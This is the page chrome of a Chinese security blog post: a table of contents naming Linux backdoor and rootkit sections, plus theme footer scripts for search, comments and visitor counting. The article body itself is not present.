              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#PAM后门"><span class="nav-number">1.</span> <span class="nav-text">PAM后门</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#概述："><span class="nav-number">1.1.</span> <span class="nav-text">概述：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#openssh后门"><span class="nav-number">2.</span> <span class="nav-text">openssh后门</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SSH留后门"><span class="nav-number">2.1.</span> <span class="nav-text">SSH留后门</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#清除痕迹"><span class="nav-number">2.2.</span> <span class="nav-text">清除痕迹</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#隐身登陆"><span class="nav-number">2.3.</span> <span class="nav-text">隐身登陆</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SSH-wrapper后门"><span class="nav-number">3.</span> <span class="nav-text">SSH wrapper后门</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#概述"><span class="nav-number">3.1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#目标端"><span class="nav-number">3.2.</span> <span class="nav-text">目标端</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#控制端"><span class="nav-number">3.3.</span> <span class="nav-text">控制端</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#rootkit"><span class="nav-number">4.</span> <span class="nav-text">rootkit</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Mafix"><span class="nav-number">4.1.</span> <span class="nav-text">Mafix</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
<!--
    <i class="fa fa-heart"></i>
-->
	<i class="fa fa-address-card-o" aria-hidden="true"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">RcoIl</span>
</div>
<!--

<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>
-->


        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-blind" aria-hidden="true"></i>本站访客数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-user-md" aria-hidden="true"></i>本站总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>


        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  






  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  


  




	





  





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  






  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
      search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.popup').toggle();
    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';
      $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = $( "entry", xmlResponse ).map(function() {
            return {
              title: $( "title", this ).text(),
              content: $("content",this).text(),
              url: $( "url" , this).text()
            };
          }).get();
          var $input = document.getElementById(search_id);
          var $resultContent = document.getElementById(content_id);
          $input.addEventListener('input', function(){
            var matchcounts = 0;
            var str='<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length > 1) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var content_index = [];
                var data_title = data.title.trim().toLowerCase();
                var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                var data_url = decodeURIComponent(data.url);
                var index_title = -1;
                var index_content = -1;
                var first_occur = -1;
                // only match artiles with not empty titles and contents
                if(data_title != '') {
                  keywords.forEach(function(keyword, i) {
                    index_title = data_title.indexOf(keyword);
                    index_content = data_content.indexOf(keyword);
                    if( index_title >= 0 || index_content >= 0 ){
                      isMatch = true;
                      if (i == 0) {
                        first_occur = index_content;
                      }
                    }

                  });
                }
                // show search results
                if (isMatch) {
                  matchcounts += 1;
                  str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                  var content = data.content.trim().replace(/<[^>]+>/g,"");
                  if (first_occur >= 0) {
                    // cut out 100 characters
                    var start = first_occur - 20;
                    var end = first_occur + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if(start == 0){
                      end = 50;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    var match_content = content.substring(start, end);
                    // highlight all keywords
                    keywords.forEach(function(keyword){
                      var regS = new RegExp(keyword, "gi");
                      match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                    });

                    str += "<p class=\"search-result\">" + match_content +"...</p>"
                  }
                  str += "</li>";
                }
              })};
            str += "</ul>";
            if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
            if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
            $resultContent.innerHTML = str;
          });
          proceedsearch();
        }
      });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("KVNdpVifyFqJPx0bzSg6cN7z-gzGzoHsz", "vlNRwqLbdUTKC1W06gjYj0iG");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  

</body>
</html>
